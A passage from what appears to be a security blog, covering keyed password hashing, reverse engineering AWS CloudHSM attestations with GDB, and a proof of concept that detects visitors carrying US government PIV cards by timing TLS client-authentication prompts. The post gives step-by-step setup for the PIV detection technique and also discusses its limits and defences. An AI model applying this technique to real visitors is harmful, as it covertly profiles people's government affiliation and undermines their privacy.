Aside from committing the cardinal sin of computer science— inefficiency— there is a more troubling issue with this approach: it places the burden of security on users. The security of the password depends not only on the choice of hash function and its parameters, but also on the quality of the password selected. Quality is elusive to define formally, despite no shortage of “password strength meters” on websites egging users on to max out their scale. Informally it is a measure of how unlikely that password is to be included among guesses tried by a hypothetical attacker. That of course depends on exactly the order an attacker goes about guessing. Given that the number of all possible passwords is astronomically large, no classical computer has a chance of going through each guess even when a simple hash function is used. (Quantum-computers provide a speed-up in principle with Grover’s algorithm.) Practical attacks instead leverage the weak point: human factors. Users have difficulty remembering long, random strings. Absent some additional help such as password managers to generate such random choices, they are far more likely to pick simple ones with patterns: dictionary words, keyboard sequences (“asdfgh”),  names of relatives, calendar dates. Attacks exploit this fact by ordering the sequence of guesses from simple to increasing complexity. The password “sunshine123” will be tried relatively early. Meanwhile “x3saUU5g0Y0t” may be out of reach: there is not enough compute power available to the attacker to get that far down the list of candidates in the allotted time. Upshot of this constraint: users with weak passwords are at higher risk if an attacker gets hold of password hashes.

Not surprisingly websites are busy making up arbitrary password complexity rules, badgering user with random restrictions: include mixed case, sprinkle in numerical digits, finish off with a touch of special characters but not that one. This may look like an attempt to improve security for customers. Viewed from another perspective, it is an abdication of responsibility: instead of providing the same level of security for everyone, the burden of protecting password hashes from brute-force attack is shifted to customers.

To be clear, there is a minimal level of password quality helpful to resist online attacks. This is when the attacker tries to login through standard avenues, typically by entering the password into a form. Online attacks are very easy to detect and protect against: most services will lock out accounts after a handful of incorrect guesses or require CAPTCHA to throttle attempts. Because attackers can only get in a handful of tries this way, only the most predictable choices are at risk. (By contrast an attacker armed with stolen database of password hashes is only limited by the processing power available. Not to mention this attack is silent: because there is no interaction with the website— unlike the online guessing approach— the defenders have no idea that an attack is underway or which accounts need to be locked for protection.) Yet the typical password complexity rules adopted by websites go far beyond what is required to prevent online guessing. Instead they are aimed at the worst-case scenario of an offline attack against leaked password hashes.

Side-stepping the arms race: keyed hashing

One way to relieve end-users from the responsibility of securing their own password storage— as long as passwords remain in use, considering FIDO2 is going nowhere fast— is to mix in a secret into the hashing process. That breaks an implicit but fundamental assumption in the threat model: we have been assuming attackers have access to the same hash function as the defenders use so they can run it on their own hardware millions of times. That was certainly the case for the original UNIX password hashing function “crypt.” (Side-note: ironically crypt was based on the block cipher DES which uses a secret-key to encrypt data. “Crypt” itself does not incorporate a key.) But if the hash function requires access to some secret only known  to the defender, then the attacker is out of luck:

For this approach to be effective, the “unknown” must involve a cryptographic secret and not the construction of the function. For example making some tweaks to bcrypt and hoping the attacker remains unaware of that change provides no meaningful benefit. That would be a case of the thoroughly discredited security-through-obscurity approach. As soon as the attacker gets wind of the changes— perhaps by getting access to source code in the same breach that resulted in the leak of password hashes— it would be game over.

Instead the unknown must be a proper cryptographic key that is used by the hash function itself. Luckily this is exactly what a keyed hash does. In the same way that a plain hash function transform input of arbitrary size into a fixed size output in an irreversible manner, a keyed hash does the same while incorporating a key.

KH(message, key) → short hash

HMAC is one of the better options but there are others including the older generation CMAC and newer alternatives such as Poly1305 and KMAC. All of these functions share the same underlying guarantee: without knowing the key, it is computationally difficult to produce the correct result for a new message. That holds true even when the attacker can “sample” the function on other messages. For example an attacker may have multiple accounts on the same website and observe the keyed hashes for his/her own accounts for which he/she has selected the password. Assuming our choice of keyed hash lives up to its advertised properties, that would still provide no advantage in being able to compute keyed-hashes on other candidate passwords.

Modern options for key management

The main challenge for deploying keyed hashing at scale comes down to managing the lifecycle of the key. There are three areas to address:

  1. Confidentiality is paramount. This key must be guarded well. If attackers get hold of it, it stops being a keyed hash and turns into a plain hash. (One way to mitigate that is to apply the keyed hash in series after an old-school, slow unkeyed hash. More on this in a follow up post.) That means the key can not be stored in say the same database where the password hashes are kept: otherwise any attack that could get at hashes would also divulge the key, losing out on any benefits.
  2. Availability is equally critical. Just as important as preventing attackers from getting their hands on the key is making sure defenders do not lose their copy. Otherwise users will not be able to login: there is no way to validate whether they supplied the right password without using this key to recompute the hash. That means it can not be some ephemeral secret generated on one server and never backed-up elsewhere. Failure at that single point would result in loss of the only existing copy and render all stored hashes useless for future validation.
  3. Key rotation is tricky. It is not possible to simply “rehash” all passwords with a new key whenever the service decides it is time for change. There is no way to recover the original password out of the hash, even with possession of the current key. Instead there will be an incremental/rolling migration: as each customer logs in and submits their cleartext password, it will be validated against the current version of the key and then rehashed with the next version to replace the database entry.

Of these #3 is something an inevitable implementation twist, not that different in spirit from trying to migrate from one unkeyed hash to another. But there is plenty of help available in modern cloud environments to solve the first two problems.

Until about ~10 years ago using dedicated cryptographic hardware— specifically HSM or hardware security module— was the standard answer to any key management problem with this stringent combination of confidentiality and availability. HSMs allow “grounding” secrets to physical objects in such a way that the secret can be used but not disclosed.  This creates a convenient oracle abstraction: a blackbox that can be asked to perform the keyed-hash computations on any input message of our choosing, but can not be coerced to divulge the secret involved in those computations. Unfortunately those security guarantees come with high operational overhead: purchasing hardware, setting them up  in one or more physical data centers and working with the arcane, vendor-specific procedures to synchronize key material across across multiple units while retaining some backups in case the datacenter itself goes up in flames. While that choice is still available today and arguably provides the highest level of security/control, there are more flexible options with different tradeoffs along the curve:

  • CloudHSM offerings from AWS and Google have made it easier to lease HSMs without dealing with physical hardware. These are close to the bare-metal interface of the underlying hardware but often throw-in some useful functionality such as replication and backup automatically.
  • One level of abstraction up, major cloud platforms have all introduced “Key Management Service” or KMS offerings. These are often backed by an HSM but hide the operational complexity and offer simpler APIs for cryptographic operations compared to the native PKCS#11 interface exposed by the hardware. They also take care of backup and availability, often providing extra guard-rails that can not be removed. For example AWS imposes a mandatory delay for deleting keys. Even an attacker that temporarily gains AWS root permissions can not inflict permanent damage by destroying critical keys.
  • Finally TPMs and virtualized TPMs have become common enough that they can be used often at a fraction of the cost of HMSs. TPM can provide the same blackbox interface for computing HMACs with a secret key held in hardware. TPMs do not have the same level of tamper resistance against attackers with physical access but that is often not the primary threat one is concerned with. A more serious limitation is that TPMs lack replication or backup capabilities. That means keys must be generated outside the production environment and imported into each TPM, creating weak points where keys are handled in cleartext. (Although this only has to be done once for the lifecycle of the hardware. TPM state is decoupled form the server. For example all disks can be wiped and OS reinstalled with no effect on imported keys.)

Threat-model and improving chances of detection

In all cases the threat model shifts. Pure “offline” attacks are no longer feasible even if an attacker can get hold of password hashes. (Short of a physical attack where the adversary walks into the datacenter and rips an HSM out of the rack or yanks the TPM out of the server board— hardly stealthy.) However that is not the only scenario where an attacker can access the same hash function used by the defenders to create those hashes. After getting sufficient privileges in the production environment, a threat actor can also make calls to the same HSM, KMS or TPM used by the legitimate system. That means they can still mount a guessing attack by running millions of hashes and comparing against known targets. So what did the defenders gain?

First note this attack is very much online. The attacker must interact with the gadget or remote service performing the keyed hash for each guess. It can not be run in a sealed environment controlled by the attacker. This has two useful consequences:

  • Guessing speed is capped. It does not matter how many GPUs the attacker has at their disposal. The bottleneck is the number of HMAC computations the selected blackbox can perform. (Seen in this light, TPMs have an additional virtue: they are much less powerful than both HSMs and typical cloud KMSes. But this is a consequence of their limited hardware rather than any deliberate attempt to waste cycles.)
  • Attackers risk detection. In order to invoke the keyed hash they must either establish persistence in the production environment where cryptographic hardware resides or invoke the same remote APIs on a cloud KMS service. In the first case this continued presence increases the signals available to defenders for detecting an intrusion. In some cases the cryptographic hardware itself could provide clues. For example many HSMs have an audit trail of operations. Sudden spike in number of requests could be a signal of unauthorized access. Similarly in the second case usage metrics from the cloud provider provide a robust signal of unexpected use. In fact since KMS offerings typically charge per operation, the monthly bill alone becomes evidence of an ongoing brute-force attack.

CP

AWS CloudHSM key attestations: trust but verify

(Or, scraping attestations from half-baked AWS utilities)

Verifying key provenance

Special-purpose cryptographic hardware such as HSMs are one of the best options for managing high value cryptographic secrets, such as private keys controlling blockchain assets. When significant time is spent implementing such a heavyweight solution, it is often useful to be able to demonstrate this to third-parties. For example the company may want to convince customers, auditors or even regulators that critical value key material exists only on fancy cryptographic hardware, and not on a USB drive in the CEO’s pocket or some engineer’s commodity laptop running Windows XP. This is where key attestations come in handy. An attestation is effectively a signed assertion from the hardware that a specific cryptographic key exists on that device.

At first that may not sound particularly reassuring. While that copy of the key is protected by expensive, fancy hardware, what about other copies and backups lying around on that poorly guarded USB drive? These concerns are commonly addressed by design constraints in HSMs which guarantee keys are generated on-board the hardware and can never be extracted out in the clear. This first part guarantees no copies of the key existed outside the trusted hardware boundary before it was generated, while the second part guarantees no other copies can exist after generation. This notion of being “non-extractable” means it is not possible to observe raw bits of the key, save them to a file, write them on a Post-It note, turn it into a QR code, upload it to Pastebin or any of the dozens of other creative ways ops personnel have compromised key security over the years. (To the extent backups are possible, it involves cloning the key to another unit from the same manufacturer with the same guarantees. Conveniently that creates lock-in to one particular model in the name of security— or what vendors prefer to call “customer loyalty.” 🤷🏽)

CloudHSM, take #2

Different platforms handle attestation in different ways. For example in the context of Trusted Platform Modules, the operations are standardized by the TPM2 specification. This blog post looks at AWS CloudHSM, which is based on the Marvell Nitrox HSMs, previously named Cavium. Specifically, this is the second version of Amazon hosted HSM offering. The first iteration (now deprecated) was built on Thales née Gemalto née Safenet hardware. (While the technology inside an HSM advances slowly due to FIPS certification requirements, the nameplate on the outside can change frequently with mergers & acquisitions of manufacturers.)

Attestations only make sense for asymmetric keys, since it is difficult to convey useful information about a symmetric key without actually leaking the key itself. For asymmetric cryptography, there is a natural way to uniquely identify private keys: the corresponding public-key. It is sufficient for the hardware then to output a signed statement to the effect “the private key corresponding to public key K is resident on this device with serial number #123.” When the authenticity of that statement can be verified, the purpose of attestation is served. Ideally that verification involves a chain of trust going all the way back to the hardware manufacturer who is always part of the TCB. Attestations are signed with a key unique to each particular unit. But how can one be confident that unit is supposed to come with that key? Only the manufacturer can vouch for that, typically by signing another statement to the effect “device with serial #123 has attestation-signing key A.” Accordingly every attestation can be verified given a root key associated with the hardware manufacturer.

If this sounds a lot like the hierarchical X509 certificate model, that is no coincidence. The manufacturer vouches for a specific unit of hardware it built, and that unit in turn vouches for the pedigree of a specific user-owned key. X509 certificates seem like a natural fit. But not not all attestation models historically follow the standard. For example TPM2 specification defines its own (non-ASN1) binary format for attestations. It also diverges from the X509 format, relying on a complex interactive protocol to improve privacy, by having a separate, static endorsement key (itself validated by a manufacturer issued X509 certificate, confusingly enough) and any number of attestation keys that sign the actual attestations. Luckily Marvell has hewed closely to the X509 model, with the exception of the attestations themselves where another home-brew (again, non-ASN1) binary format is introduced.

Trust & don’t bother to verify?

There is scarcely any public documentation from AWS on this proprietary format. In fact given the vast quantity of guidance on CloudHSM usage, there is surprisingly no mention of proving key provenance. There is one section on verifying the HSM itself— neither necessary nor sufficient for our objective. That step only covers verifying the X509 certificate associated with the HSM, proving at best that there is some Marvell unit lurking somewhere in the AWS cloud. But that is a long ways from proving that the particular blackbox we are interacting with, identified by a private IP address within the VPC, is one of those devices. (An obvious question is whether TLS could have solved that problem. In fact the transport protocol does use certificates to authenticate both sides of the connection but in an unexpected twist, CloudHSM requires the customer to issue that certificate to the HSM. If there was a preexisting certificate already provisioned in the HSM that chains up to a Marvell CA, it would indeed have proven the device at the other end of the connection is a real HSM.)

Neither CloudHSM documentation or the latest version of CloudHSM client SDK (V5) have much to say on obtaining attestations for a specific key generated on the HSM. There are references to attestations in certain subcommands of key_mgmt_util, specifically for key generation. For example the documentation for genRSAKeyPair states:


-attest

Runs an integrity check that verifies that the firmware on which the cluster runs has not been tampered with.

This is at best an unorthodox definition of key attestation. While missing from the V5 SDK documentation, there are also references in the “previous” V3 SDK (makes you wonder what happened to V4?) to the same optional flag being available when querying key attributes with “getAttribute” subcommand. That code path will prove useful for understanding attestations: each key is only generated once, but one can query attributes any number of times to retrieve attestations.

Focusing on the V3 SDK which is no longer available for download, one immediately run into problems with ancient dependencies and incompatibility with modern Linux distributions It is linked against OpenSSL 1.x which will prevent installation out-of-the-box on modern distributions.

But even after jumping through the necessary hoops to make it work, the result is underwhelming: while the utility claims to retrieve and verify Marvell attestations, it does not expose the attestation to the user. In effect these utilities are asserting: “Take our word for it, this key lives on the HSM.” That defeats the whole point of generating attestations, namely being able to convince third-parties that keys are being managed according to certain standards. (It also raises the question of whether Amazon itself understands the threat model of a service for which it is charging customers a pretty penny.)

Step #1: Recovering the attestation

When existing AWS utilities will not do the job, the logical next step is writing code from scratch to replicate their functionality while saving the attestation, instead of throwing it away after verification. But that requires knowledge of the undocumented APIs offered by Marvell. While CloudHSM is compliant with the standard PKCS#11 API for accessing cryptographic hardware, PKCS#11 itself does not have a concept of attestations. Whatever this Amazon utility is doing to retrieve attestations involves proprietary APIs or at least proprietary extensions to APIs such as a new object attribute which neither Marvell nor Amazon have documented publicly. (Marvell has a support portal behind authentication, which may have an SDK or header files accessible to registered customers.) 

Luckily recovering the raw attestation from the AWS utility is straightforward. An unexpected assist comes from the presence of debugging symbols, making it much easier to reverse engineer this otherwise blackbox binary. Looking at function names with the word “attest”, one stands out prominently:

[ec2-user@ip-10-9-1-139 1]$ objdump -t /opt/cloudhsm/bin/key_mgmt_util  | grep -i attest
000000000042e98b l     F .text 000000000000023b              appendAttestation
000000000040516d g     F .text 0000000000000196              verifyAttestation

We can set a break point on verifyAttestation with GDB:

(gdb) info functions verifyAttestation
All functions matching regular expression "verifyAttestation":
File Cfm3Util.c:
Uint8 verifyAttestation(Uint32, Uint8 *, Uint32);
(gdb) break verifyAttestation
Breakpoint 1 at 0x40518b: file Cfm3Util.c, line 351.
(gdb) cont
Continuing.

Next generate an RSA key pair and request an attestation with key_mgmt_util:

Command:  genRSAKeyPair -sess -m 2048 -e 65537 -l verifiable -attest
Cfm3GenerateKeyPair returned: 0x00 : HSM Return: SUCCESS
Cfm3GenerateKeyPair:    public key handle: 1835018    private key handle: 1835019

The breakpoint is hit at this point, after key generation has already completed and key handles for public/private halves returned. (This makes sense; an attestation is only available after key generation has completed successfully.)

Breakpoint 1, verifyAttestation (session_handle=16809986, response=0x1da86e0 "", response_len=952) at Cfm3Util.c:351
351 Cfm3Util.c: No such file or directory.
(gdb) bt
#0  verifyAttestation (session_handle=16809986, response=0x1da86e0 "", response_len=952) at Cfm3Util.c:351
#1  0x0000000000410604 in genRSAKeyPair (argc=10, argv=0x697a80 <vector>) at Cfm3Util.c:4555
#2  0x00000000004218f5 in CfmUtil_main (argc=10, argv=0x697a80 <vector>) at Cfm3Util.c:11360
#3  0x0000000000406c86 in main (argc=1, argv=0x7ffdc2bb67f8) at Cfm3Util.c:1039

Owing to the presence of debugging symbols, we also know which function argument contains the pointer to the attestation in memory (“response”) and its size (“response_len”.) GDB can save that memory region to file for future review:

(gdb) dump memory /tmp/sample_attestation response response+response_len

Side note before moving on to the second problem, namely making sense of the attestation: While this example showed interactive use of GDB, in practice the whole setup would be automated. GDB allows defining automatic commands to execute after a breakpoint, and also allows launching a binary with a debugging “script.” Combining these capabilities:

  • Create a debugger script to set a breakpoint on verifyAttestation. The breakpoint will have an associated command to write the memory region to file and continue execution. In that sense the breakpoint is not quite “breaking” program flow but taking a slight detour to capture memory along the way.
  • Invoke GDB to load this script before executing the AWS utility.

Step #2: Verifying the signature

Given attestations in raw binary format, next step is parsing and verify the contents, mirroring what the AWS utility is doing in the “verifyAttestation” function. Here we specifically focus on attestations returned when querying key attributes because that presents a more general scenario: key generation takes place only once, while attributes of an existing key can be queried anytime. 

By “attributes” we are referring to PKCS#11 attributes associated with a cryptographic object present on the HSM. Some examples:

  • CKA_CLASS: Type of object (symmetric key, asymmetric key…)
  • CKA_KEYTYPE: Algorithm associated with a key (eg AES, RSA, EC…)
  • CKA_PRIVATE: Does using the key require authentication?
  • CKA_EXTRACTABLE: Can the raw key material be exported out of the HSM? (PKCS#11 has an interesting rule that this attribute can only be changed from true→false, it can not go in the other direction.)
  • CKA_NEVEREXTRACTABLE: Was the CKA_EXTRACTABLE attribute ever set to true? (This is important when establishing whether an object is truly HSM-bound. Otherwise one can generate an initially extractable key, make a copy out of the HSM and later flip the attribute.)

Experiments show the exact same breakpoint for verifying attestations is triggered through this alternative code path when “-attest” flag is present:

Command:  getAttribute -o 524304 -a 512 -out /tmp/attributes -attest
Attestation Check : [PASS]
Verifying attestation for value
Attestation Check : [PASS]
Attribute size: 941, count: 27
Written to: /tmp/attributes file
Cfm3GetAttribute returned: 0x00 : HSM Return: SUCCESS

Here is an example of the text file written with all attributes for an RSA key is. Once again the attestation itself is verified and promptly discarded by the utility under normal execution. But debugger tricks described earlier help capture a copy of the original binary block returned. There is no public documentation from AWS or Marvel on the internal structure of these attestations. Until recently there was a public article on the Marvell website (no longer resolves) which linked to two python scripts that are still accessible as of this writing:

These scripts are unable to parse attestations from step #1, possibly because they are associated with a different product line or perhaps different version of the HSM firmware. But they offer important clues about the format, including the signature format: it turns out to be the last 256 bytes of the attestation, carrying a 2048-bit RSA signature. In fact one of the scripts can successfully verify the signature on a CloudHSM attestation, when given the partition certificate from the HSM:

[ec2-user@ip-10-9-1-139 clownhsm]$ python3 verify_attest.py partition_cert.pem sample_attestation.bin 
*************************************************************************
Usage: ./verify_attest.py <partition.cert> <attestation.dat>
*************************************************************************
verify_attest.py:29: DeprecationWarning: verify() is deprecated. Use the equivalent APIs in cryptography.
  crypto.verify(cert_obj, signature, blob, 'sha256')
Verify3 failed, trying with V2
RSA signature with raw padding verified
Signature verification passed!

Step #3: Parsing fields in the attestation

Looking at the remaining two scripts we can gleam how PKCS#11 attributes are encoded in general. Marvel has adopted the familiar tag-length-value model from ASN1 and yet is inexplicably not ASN1. Instead each attribute is represented as concatenation of:

  • Tag containing the PKCS#11 attribute identifier, as 32-bit integer in big-endian format 
  • Length of the attributes in bytes, also 32-bit integer in same format
  • Variable length byte array containing the value of the attribute 

One exception to this pattern are the first 32-bytes of an attestation. That appears to be a fixed-size header containing metadata, which does not conform to this TLV pattern. Disregarding that section, here is a sample Python script for parsing attributes and outputting them using friendly PKCS11 names and appropriate formatting where possible. (For example CKA_LABEL as string, CKA_SENSITIVE as boolean and CKA_MODULUS_BITS as plain integer.)

CP

Spot the Fed: CAC/PIV card edition

Privacy leaks in TLS client authentication

Spot the Fed is a long-running tradition at DefCon. Attendees try to identify suspected members of law enforcement or intelligence agencies blending in with the crowd. In the unofficial breaks between scheduled content, suspects “denounced” by fellow attendees as potential Feds are invited on stage— assuming they are good sports about it, which a surprising number prove to be— and interrogated by conference staff to determine if the accusations have merit. Spot-the-Fed is entertaining precisely because it is based on crude stereotypes, on a shaky theory that the responsible adults holding button-down government jobs will stand out in a sea of young, irreverent hacking enthusiasts. While DefCon badges feature a cutting-edge mix of engineering and art, one thing they never have is identifying information about the attendee. No names, affiliation or location. (That is in stark contract to DefCon’s more button-down, corporate cousin, Blackhat Briefings which take place shortly before DefCon. BlackHat introductions often start with attendees staring at each others’ badge.)

One can imagine playing a version of Spot the Fed online: determine which visitors to a website are Feds. While there are no visuals to work with, there are plenty of other signals ranging from the visitor IP address to the specific configuration of their browser and OS environment. (EFF has a sobering demonstration on just how uniquely identifying some of these characteristics can be.) This blog post looks at a different type of signal that can be gleamed from a subset of US government employees: their possession of a PIV card.

Origin stories: HSPD 12

The story begins in 2004 during the Bush era with an obscure government edict called HSPD12: Homeland Security Presidential Directive #12:

There are wide variations in the quality and security of identification used to gain access to secure facilities where there is potential for terrorist attacks. In order to eliminate these variations, U.S. policy is to enhance security, increase Government efficiency, reduce identity fraud, and protect personal privacy by establishing a mandatory, Government-wide standard for secure and reliable forms of identification issued by the Federal Government to its employees and contractors […]

That “secure and reliable form of identification” became the basis for one of the largest PKI and smart-card deployments. Initially called CAC for “Common Access Card” and later superseded by PIV or “Personal Identity Verification,” these two programs combined for the issuance of millions of smart-cards bearing X509 digital certificates issued by a complex hierarchy of certificate authorities operated by the US government.

PIV cards were envisioned to function as “converged” credentials, combining physical access and logical access. They can be swiped or inserted into a badge-reader to open doors and  gain access to restricted facilities. (In more low-tech scenarios reminiscent of how Hollywood depicts access checks, the automated badge reader is replaced by an armed sentry who casually inspects the card before deciding to let the intruders in.) But they can also open doors in a more virtual sense online: PIV cards can be inserted into a smart-card reader or tapped against a mobile device over NFC to leverage the credential online. Examples of supported scenarios:

  • Login to a PC, typically using Active Directory and the public-key authentication extension to Kerberos
  • Sign/encrypt email messages via S/MIME
  • Access restricted websites in a web browser, using TLS client authentication.

This last capability creates an opening for remotely detecting whether someone has a PIV card— and by extension, affiliated with the US government or one of its contractors.

Background on TLS client authentication

Most websites in 2024 use TLS to protect the traffic from their customers against eavesdropping or tampering. This involves the site obtaining a digital certificate from a trusted certificate authority and presenting that credential to bootstrap every connection. Notably the customers visiting that website do not need any certificates of their own. Of course they must be able validate the certificate presented by that website, but that validation step does not require any private, unique credential accessibly only to that customer. As far as the TLS layer is concerned, the customer or “client” in TLS terminology, is not authenticated. There may be additional authentication steps at a higher layer in the protocol stack, such as a web page where the customer inputs their email address and password. But those actions take place outside the TLS protocol.

While the majority of TLS interactions today are one-sided for authentication, the protocol also makes provisions for a mode where both sides authenticate each other, commonly called “mutual authentication.” This is typically done with the client also presenting an X509 certificate. (Being a complex protocol TLS has other options including a “preshared key” model but those are rarely deployed.) At a high level, client authentication adds a few more steps to the TLS handshake:

  • Server signals to the client that certificate authentication is required
  • Server sends a list of CAs that are trusted for issuing client certificates. Interestingly this list can be empty, which is interpreted as anything-goes
  • Client sends a certificate issued by one of the trusted anchors in that list, along with a signature on a challenge to prove that it is control of the associated private key

Handling privacy risks

Since client certificates typically contain uniquely identifying information about a person, there is an obvious privacy risk from authenticating with one willy-nilly to every website that demands a certificate. These risks have been long recognized and largely addressed by the design of modern web browsers.

A core privacy principle is that TLS client authentication can only take place with user consent. That comes down to addressing three different cases when a server requests a certificate from the browser:

  1. User has no certificate issued by any of the trust anchors listed by the server. In this case there is no reason to interrupt the user with UI; there is nothing actionable. Handshake continues without any client authentication. Server can reject such connections by terminating the TLS handshake or proceed in unauthenticated state. (The latter is referred to as optional mode, supported by popular web servers including nginx.)
  2. There is exactly one certificate meeting the criteria. Early web browsers would automatically use that certificate, thinking they were doing the user a favor by optimizing away an unnecessary prompt. Instead they were introducing a privacy risk: websites could silently collect personally identifiable information by triggering TLS client authentication and signaling that they will accept any certificate. (Realistically this “vulnerability” only affected a small percent of users because client-side PKI deployments were largely confined to enterprises and government/defense sectors. That said, those also happen to be among the most stringent scenarios where the customer cares a lot about operational security and privacy.)
    Browser designers have since seen the error of their ways. Contemporary implementation are consistent in presenting some UI before using the certificate. This is an important privacy control for users who may not want to send identifying information:
  • There is still one common UX optimization to streamline this: users can indicate that they trust a website and are always willing to authenticate with a specific certificate there. Here is Firefox presenting a checkbox for making that decision stick:
  1. Multiple matching certificates can be used. This is treated identically as case #2, with the dialog showing all available certificate for the user to choose from, or decline authentication altogether.

Detecting the existence of a certificate

Interposing a pop-up dialog appears to address privacy risks from websites attempting to profile users through client certificates. While any website visited can request a certificate, users remain in control of deciding whether their browser will go along with. (And if the person complies and sends along their certificate to a website that had no right to ask? Historically browser vendors react to such cases with a time-honored strategy: blame the user— “PEBCAC! It’s their fault for clicking OK.”)

But even with the modal dialog, there is an information leak sufficient to enable shenanigans in the spirit of spot-the-Fed. There is a difference between case #1—no matching certificates— and remaining cases where there is at least one matching certificate. In the latter cases some UI is displayed, disrupting the TLS handshake until the user interacts with that UI to express their decision either way. In the former case, TLS connection proceeds without interruption. That difference can be detected: embed a resource that requires TLS client authentication and measure its load time.

While the browser is waiting for the user to make a decision, the network connection for retrieving the resource is stalled. Even if the user correctly decides to reject the authentication request, page load time has been altered. (If they agree, timing differences are redundant: the website gets far more information than it bargained for with the full certificate.) The resulting delay is on the order of human reaction times—the time taken to process the dialog and click “cancel”— well within the resolution limits of web Performance API.

Proof of concept: Spot-the-Fed

This timing check suffices to determine whether a visitor has a certificate from any one of a group of CAs chosen by the server. While the server will not find out the exact identity of the visitor— we assume he/she will cancel authentication when presented with the certificate selection dialog— the existence of a certificate alone is enough to establish affiliation. In the case of the US government PKI program, the presence of a certificate signals that the visitor has a PIV card.

Putting together a proof-of-concept:

  1. Collect issuer certificates for the US federal PKI. There are at least two ways to source this.
  1. Host a page on Github for the top-level document. It will include basic javascript to measure time taken for loading an embedded image that requires client authentication.
  2. Because Github Pages do not support TLS client authentication, that image must be hosted somewhere else. For example one can use nginx running on an EC2 instance to serve  a one-pixel PNG image.
  3. Configure nginx for optional TLS client authentication, with trust anchors set to the list of CAs retrieved in step #1

There is one subtlety with step #4: nginx expects the full issuer certificates in PEM format. But if using option 1A above, only the issuer names are available. This turns out not to be a problem: since TLS handshake only deals in issuer names, one can simply create a dummy self-signed CA certificate with the same issuer but brand new RSA key. For example, from login.gov we learn there is a trusted CA with the distinguished name “C=US, O=U.S. Government, OU=DoD, OU=PKI, CN=DOD EMAIL CA-72.”  It is not necessary to have the actual certificate for this CA (although it is present in the publicly availably bundles linked above); we can create a new self-signed certificate with the same DN to appease nginx. That dummy certificate will not work for successful TLS client authentication against a valid PIV card— the server can not validate a real PIV certificate without the real issuer public key of the issuing CA. But that is moot; we expect users will refuse to go through with TLS client authentication. We are only interested in measuring the delay caused by asking them to entertain the possibility.

Limitations and variants

Stepping back to survey what this PoC accomplishes: we can remotely determine if a visitor to the website has a certificate issued by one of the known US government certificate authorities. This check does not require any user interaction, but it also comes with some limitations:

  • Successful detection requires that the visitor has a smart-card reader connected to their machine, their PIV card is present in that reader and all necessary middleware required to use that card is present. In practice, no middleware is required for the common case of Windows: PIV support has been built into the OS cryptography stack since Vista. Browsers including Chrome & Edge can automatically pick up any cards without requiring additional configuration. On other platforms such as MacOS and Linux additional configuration may be required. (That said: if the user already has scenarios requiring use of their PIV card on that machine, chances are it is already configured to also allow the card to work in the browser without futzing with any settings.)
  • It is not stealthy in the case of successful identification. Visitors will have seen a certificate selection dialog come up. (Those without a client certificate however will not observe anything unusual.) That is not a common occurrence when surfing random websites. There are however a few websites (mis?)configured to demand client certificates from all visitors, such as this IP6 detection page.
    • It may be possible to close the dialog without user interaction. One could start loading a resource that requires client authentication and later use javascript timers to cancel that navigation. In theory this will dismiss the pending UI. (In practice it does not appear to work in Chrome or Firefox for embedded resources, but works for top-level navigation.) To be clear, this does not prevent the dialog from appearing in the first place. It only reduces the time the dialog remains visible, at the expense of increased false-positives because detection threshold must be correspondingly lower.
    • A less reliable but more stealthy approach can be built if there is some website the target audience frequently logs into using their PIV card. In that case the attacker can attempt to source embedded content from that site— such as an image— and check if that content loaded successfully. This has the advantage that it will completely avoid UI in some scenarios. If the user has already authenticated to the well-known site within the same browser session, there will be no additional certificate selection dialogs. That signals the user has a PIV card because they are able to load resources from a site ostensibly requiring a certificate from one of the trusted federal PKI issuer. In some cases UI will be skipped  even if the user has not authenticated in the current session, but has previously configured their web browser to automatically use the certificate at that site, as is possible with Firefox. (Note there will also be a PIN prompt for the smart-card— unless it has been recently used in the same browser session.)
  • While the PoC checks whether the user has a certificate from any one of a sizable collection of CAs, it can be modified to pinpoint the CA. Instead of loading a single image, one can load dozens of images in series from different servers each configured to accept only one CA among the collection. This can be used to better profile the visitor, for example to distinguish between contractors at Northrop Grumman (“CN=Northrop Grumman Corporate Root CA-384”) versus employees from the Department of Transportation (“CN=U.S. Department of Transportation Agency CA G4.”)
  • There are some tricky edge-cases involving TLS session resumption. This is a core performance improvement built into TLS to avoid time-consuming handshakes for every connection. Once a TLS session is negotiated with a particular server—with or without client authentication— that session will be reused for multiple requests going forward. Here that means loading the embedded image a second time will always take the “quick” route by using the existing session. Certificate selection UI will never be shown even if there is a PIV card present. Without compensating logic, that would result in false-negatives whenever the page is refreshed or revisited within the same session. This demonstration attempts to counteract that by setting a session cookie when PIV cards are detected and checking for that cookie on subsequent runs. In case the PoC is misbehaving, try using a new incognito/private window.

Work-arounds

The root cause of this information disclosure lies with the lack of adequate controls around TLS client authentication in modern browsers. While certificates will not be used without affirmative consent from the consumer, nothing stops random websites from initiating an authentication attempt.

Separate browser profiles are not necessarily effective as a work-around. At first it may seem promising to create two different Chrome or Edge profiles, with only one profile used for “trusted” sites setup for authenticating with the PIV card. But unlike cookie jars, digital certificates are typically shared across all profiles. Chrome is not managing smart-cards; Windows cryptography API is responsible for that. That system has no concept of “profiles” or other boundaries invented by the browser. If there is a smart-card reader with a PIV card present attached, the magic of OS middleware will make it available to every application, including all browser profiles.

Interestingly using Firefox can be a somewhat clunky work-around because Firefox uses NSS library instead of the native OS API for managing certificates. While this is more a “bug” than feature in most cases due to the additional complexity of configuring NSS with the right PKCS#11 provider to use PIV cards, in this case it has a happy side-effect: it becomes possible to decouple availability of smart-cards on Firefox from Chrome/Edge. By leaving NSS unconfigured and only visiting “untrusted” sites with Firefox, one can avoid these detection tricks. (This applies specifically to Windows/MacOS where Chrome follows the platform API. It does not apply to Linux where Chrome also relies on NSS. Since there is a single NSS configuration in a shared location, both browsers remain in lock-step.) But it is questionable whether users can maintain such strict discipline to use the correct browser in every case. It would also cause problems for other applications using NSS, including Thunderbird for email encryption/signing.

Until there are better controls in popular browsers for certificate authentication, the only reliable work-around is relatively low-tech: avoid leaving a smart-card connected when the card is not being actively used. However this is impossible in some scenarios, notably when the system is configured to require smart-card logon and automatically lock the screen on card removal.

CP

Password management quirks at Fidelity

IVR Login

“Please enter your password.”

While this prompt commonly appears on webpages, it is not often heard during a phone call. This was not a social-engineering scam either: it was part of the automated response from the Fidelity customer support line. The message politely invites callers to enter their Fidelity password using the dial-pad, in order to authenticate the customer before connecting them to a live agent. There is one complication: dial-pads only have digits and two symbols, asterisk/plus and pound key. To handle the full range of symbols present in passwords, the instructions call for using the standard convention for translating letters into digits helpfully displayed on most dial-pads:

Standard dial-pad, with mapping of letters to numbers
(Image from Wikipedia)

The existence of this process indicates a quirk in the way Fidelity stores passwords for their online brokerage service.

Recap: storing passwords without storing them

